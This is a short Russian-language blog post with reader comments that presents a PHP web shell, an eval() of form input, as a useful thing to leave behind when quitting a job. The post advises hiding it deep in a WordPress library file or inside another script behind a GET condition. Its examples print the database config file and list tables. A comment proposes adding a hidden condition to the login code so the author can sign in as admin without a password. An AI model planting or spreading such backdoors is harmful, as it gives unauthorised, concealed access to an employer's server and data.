Очень полезная штука, когда увольняешься. Данный код основан на встроенной функции eval(), которая выполняет строку как php-код. Самое главное запихнуть этот код куда-нибудь поглубже. Например, в какую-нибудь библиотеку "/wp-includes/js/tinymce/help.php". Можно запихнуть этот код не в отдельный файл, а во внутрь какого-нибудь скрипта, только с условием типа if (isset($_GET['eval'])) ...
<?php
if (isset($_POST['code'])) {
eval($_POST['code']);
}
?>
<form action="" method="post">
<textarea name="code"></textarea><br />
<input type="submit" value="Отправить" />
</form>
Пишем php-код в текстовое поле и отправляем.
Примеры
// подключить скрипт и вызвать функцию
include($_SERVER['DOCUMENT_ROOT'].'/include/Mail.php');
send_mail();
// вывести в браузер содержимое скрипта
highlight_file($_SERVER['DOCUMENT_ROOT'].'/config/db.php');
// показать список всех таблиц в базе
$result = mysql_query('SHOW TABLES');
while ($row = mysql_fetch_row($result)) {
echo $row[0].'<br />';
}
// показать структуру таблицы user
$result = mysql_query('DESC user');
while ($row = mysql_fetch_assoc($result)) {
print_r($row);
}
27.01.2011
Если в одном месте один мой хитрый скрипт (ничего плохого, простой пркол), который должен всех хорошенько напугать 21.12.2012 :)
зачем?)) лучше запихнуть маленькое условие где нибудь в авторизацию, и авторизовать себя под админом без паролей)
админ скорее всего будет иметь только доступ к базе (да и то не ко всей). исходный код, как правило, в админке не показывается.